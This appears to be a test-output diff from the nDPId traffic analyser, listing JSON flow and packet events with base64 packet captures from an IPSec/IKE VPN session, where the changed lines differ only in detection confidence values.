+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946752614924,"flow_last_seen":946753058099,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00805{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00571{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":245,"packets-processed":244,"total-skipped-flows":0,"total-l4-payload-len":114872,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":12,"current-active-flows":2,"total-active-flows":12,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":93,"global_ts_msec":946756085796} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756085796,"flow_last_seen":946756085796,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946756085796,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946756085796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":474,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":474,"pkt_l4_len":440,"thread_ts_msec":946756085796,"pkt":"eJS0JASgYDjgxTWgCABFAAHMAuBAAP0RjIXAqAJkbe27wasjEZQBuEiAAAAAAFdVWmAzg3AtUnd8qAS0wgwuICMIAAAAAQAAAawjAAGQQF79b6huHtPKErITdIUO\/QjlpSHswO\/9ioYhBnLYsJUoIUmfnUpBr3Po\/OdJJVNMepzAOvSeggL2pjZTj9dKmnR3\/PM3fhBDF8NcMDQbBXvC7QxTKJZTnUfkk881X5a\/g77eRsDByk24BKRFupHgXm9JxMuUqz9AuVOnm4NBfwKTMVXjUNEQtkAzVuhsDcyqKusYnJ81cfYdIk5LwLgUQczUBvlDCka3OorgvxScDCOZppjI661UpcnKSAOl10AUzitOXX4Sf1q4\/2+eSwMmz9NIx5gR4C8OsKHWrS46IlJialinycMwsZsTGmE66+bCHIal8y8Ar1mZux6G9skkXM0\/xDcT8HX0NJm3xHn4rYAEy6+FVyThDICTkGOQ8\/OGbAHfatyTPGmM7gUHR\/CIqk2d\/5qVY\/q+N89fy1rlbMoNv1B8muSwUse4B1yQM9+HJ7F8cmircdWKEpZAIvPkrObfa2jQuXUNlIRVLPokutIPku+Rs972Lm4Ub8AH5EGOnNdgwZBbtxuUUUg4"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756085796,"flow_last_seen":946756085796,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946756085796,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756085796,"flow_last_seen":946756085796,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946756085796,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946756085939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946756085939,"pkt":"YDjgxTWgeJS0JASgCABFAADs+pAAAPcR27Rt7bvBwKgCZBGUqyMA2MgYAAAAAFdVWmAzg3AtUnd8qAS0wgwuICMgAAAAAQAAAMwkAACwGwVeph0IkLSNrMQe9KFyeKE0QuZjK7my0+yRWqTxlzWUA3mRbb7srC4MGUsPo5STZ+eQ0KsfgOiKhZp7JjPvU1DpL0hGi1nu0ki7rscKkFtuaIb3IUMJBUDOuKDG8TawmlzjbXA5xqwrTD4Y0Fd66XG6kIfvpzqyfjU8FQSbpLWobjdeptHYBdDQ0iUIflW9bAVW8UU1fJkZpox2qaywq8WitQBykYYx17qunw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946756086594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946756086594,"pkt":"eJS0JASgYDjgxTWgCABFAACMAuFAAP0RjcTAqAJkbe27wasjEZQAeNGiAAAAAFdVWmAzg3AtUnd8qAS0wgwuICMIAAAAAgAAAGwwAABQQF79b6huHtPKErITdIUO\/aRiOYMcetOdPsiFIJLCSJQ4cF8NEcwjhKJjD422ZZANRXbfE3zsy3AffzRBbdt1fenFelwBzHh8VhUHEg=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00897{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946756088542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":946756088542,"pkt":"eJS0JASgYDjgxTWgCABFAAFsAtxAAP0RjOnAqAJkbe27wasjAfQBWDUKbglRU5LrZucAAAAAAAAAACEgIggAAAAAAAABUCIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAADD2Z5sNtrXmz8BOvNVblZ8eEq2k5A\/gwT84dfeS3MBtg7koKMeAMZ2TQn3soqXj5\/oVDPPLSSxj5O\/4p21wH6jJFtfjZLlhx0Y8hWCH4o4ded+u2fr012XP1MaDigsW2Zl+T0\/xFmuUZe1rDGZDhBjVPazOyZ4OL3Nkxu4by16eSkAABju+4lbxLErZd2AJ\/RH4tY7CBVRzCkAABwAAEAEUNm8N0zQnJIJGe4OghGz2QL+aNsAAAAcAABABdNtFsod1u6ziduzF06LuHj0Rn00"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946756088542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946756088542,"pkt":"YDjgxTWgeJS0JASgCABFAABQ+doAAPcR3QZt7bvBwKgCZAH0qyMAPCrmbglRU5LrZucAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVk+LiqnjzgFIY5qXmyw=="} 00929{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946756088542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":402,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":402,"pkt_l4_len":368,"thread_ts_msec":946756088542,"pkt":"eJS0JASgYDjgxTWgCABFAAGEAt1AAP0RjNDAqAJkbe27wasjAfQBcNWobglRU5LrZucAAAAAAAAAACkgIggAAAAAAAABaCEAABgAAEAGAAFVk+LiqnjzgFIY5qXmyyIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAADD2Z5sNtrXmz8BOvNVblZ8eEq2k5A\/gwT84dfeS3MBtg7koKMeAMZ2TQn3soqXj5\/oVDPPLSSxj5O\/4p21wH6jJFtfjZLlhx0Y8hWCH4o4ded+u2fr012XP1MaDigsW2Zl+T0\/xFmuUZe1rDGZDhBjVPazOyZ4OL3Nkxu4by16eSkAABju+4lbxLErZd2AJ\/RH4tY7CBVRzCkAABwAAEAEUNm8N0zQnJIJGe4OghGz2QL+aNsAAAAcAABABdNtFsod1u6ziduzF06LuHj0Rn00"} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946752614924,"flow_last_seen":946753071332,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946752614924,"flow_last_seen":946753071332,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00572{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":268,"packets-processed":267,"total-skipped-flows":0,"total-l4-payload-len":125706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":12,"current-active-flows":2,"total-active-flows":14,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":106,"global_ts_msec":946763512822} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512822,"flow_last_seen":946763512822,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763512822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946763512822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763512822,"pkt":"eJS0JASgYDjgxTWgCABFAAMktR9AAD8Rly7AqAJkbe27gSkEAfQDENJ58zGl\/JiX39YAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAAEvBr7sbEdUTWJ9k0dBABmZc7Ejd5+fgls2LInhXPIXof0NGEf3ShDQhLWvQwyrTOHoJp6BSg\/WQ2FpE\/0RoQC4TiwB6y71I8UIovX\/cQ1SapOMuGfW9hy4WHSvXuIUgOPrCXk2h1ct5lmyWAa1qglm\/4yOrGLSsZjKKjJ5jEBzKQAAJL+95CschzVY1HdnEYlr8vcXlCOBsIZVHpL4JvobbKxYKQAAHAAAQAROj53iX5wS\/J4WHCSCKNNw1F6keAAAABwAAEAF52RZaVEd3q0Q2WSKx4bLcB8WYWw="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512822,"flow_last_seen":946763512822,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763512822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512822,"flow_last_seen":946763512822,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763512822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946763512846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763512846,"pkt":"YDjgxTWgeJS0JASgCABFAABQmv4AAPcRPCNt7buBwKgCZAH0KQQAPLvu8zGl\/JiX39YAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFA8j2S3SJakzYmklIQMA=="} 01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946763512859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763512859,"pkt":"eJS0JASgYDjgxTWgCABFAAM8tSdAAD8Rlw7AqAJkbe27gSkEAfQDKNou8zGl\/JiX39YAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFA8j2S3SJakzYmklIQMCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAAEvBr7sbEdUTWJ9k0dBABmZc7Ejd5+fgls2LInhXPIXof0NGEf3ShDQhLWvQwyrTOHoJp6BSg\/WQ2FpE\/0RoQC4TiwB6y71I8UIovX\/cQ1SapOMuGfW9hy4WHSvXuIUgOPrCXk2h1ct5lmyWAa1qglm\/4yOrGLSsZjKKjJ5jEBzKQAAJL+95CschzVY1HdnEYlr8vcXlCOBsIZVHpL4JvobbKxYKQAAHAAAQAROj53iX5wS\/J4WHCSCKNNw1F6keAAAABwAAEAF52RZaVEd3q0Q2WSKx4bLcB8WYWw="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512920,"flow_last_seen":946763512920,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763512920,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946763512920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763512920,"pkt":"eJS0JASgYDjgxTWgCABFAANMtTNAAD8RlvLAqAJkbe27gTikEZQDODPtAAAAAPMxpfyYl9\/WLu8pUwPoTCguICMIAAAAAQAAAywjAAMQm+4T0qhYOJ2nn8k4sTj9kc7QbVpQ4eenWe\/yf1iWnoarRnrCz6rLbTdiz21Id73uIsQYj9ps3d842AEYoeFlivUsJclEwxfewHL\/212uvzvrG+KGtV7VnqNflc4njAqD+aN0hHdJ3bfB3G8UdNG7mqqVrSsJiy8fhJjLsaOPsmpd8ESjgwVJ5sr6EL4OXAH3BnG4s\/2fstg7KoXLtVbtLUQRg5Uve1+qBGOkS6LJ7LFcBVsfF5r9c72HqQLIaLNoOR2L3nyrHK+PyY\/+bsfw5GMZVLAnMrZ8sE+T6t1GE5kWiiAGMRR7ZJirFaa2JwFg15ZsNKheHSVD3rpx1b7KP1WXUOZC\/Cb6Aw1MpJ4V9VdsJox\/Q+Gat14OqUFcQXGFUGieDanmPlJW826dtpGd+j\/yIgb6YQhgOtVocZ5NCFUDN6oWlUPj31oEHoVK+93sMlOEGbCSHY+jAaaIsBbEBxgqESHwkQapoNTPkPv+aTg6OMGZ0YsNAPpHlAoFKtWaGaAr1i6\/QEqqSekQi27Jql1VLjQIFPUGxF0O12A60vuIWCczp3gik56D6S1iGxCysc54LhGn1Y+WofC3+wVZj5gZHsp4wP1HVBThEwmWcY5m9rlGYG9sSfQKMdjHYjbny2wrd72FtjNfi9\/FoCGSfGJ57v3vYHBAUh5s7qlFnVyIleni784VqSDWk1sgG3bFLq5Tdi131RuwMezKBmvHhHLZxG1pUxv07\/7u\/FtK6kIoCpqZvmyTFGtp5l2Xrn3jP4UXslEqNUZQC\/XGD1A6OO0lYCOJ6QNgRU8R0xTEGjko4WrZh1Nsy3DeCLqg\/zLKWgLCrK+0NjOZKJqILc5VGK4TVDyldm984ifR0a0kBTWRguG9r4uHhBEe0lKWnbvy\/nSsoTdf6UJQES6dd25qUnpXdTcEHbKj2dQMQKYkBLWmO1EjHeJ\/Dd3c\/ym07OKbgCMQPOCCHjXIGeWIaI+VAtZp2tAKPryJdHa2pcSjRW5YtPERTx\/dh0\/WGlMmw87WB1i4ye52USENJuOf"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512920,"flow_last_seen":946763512920,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763512920,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512920,"flow_last_seen":946763512920,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763512920,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 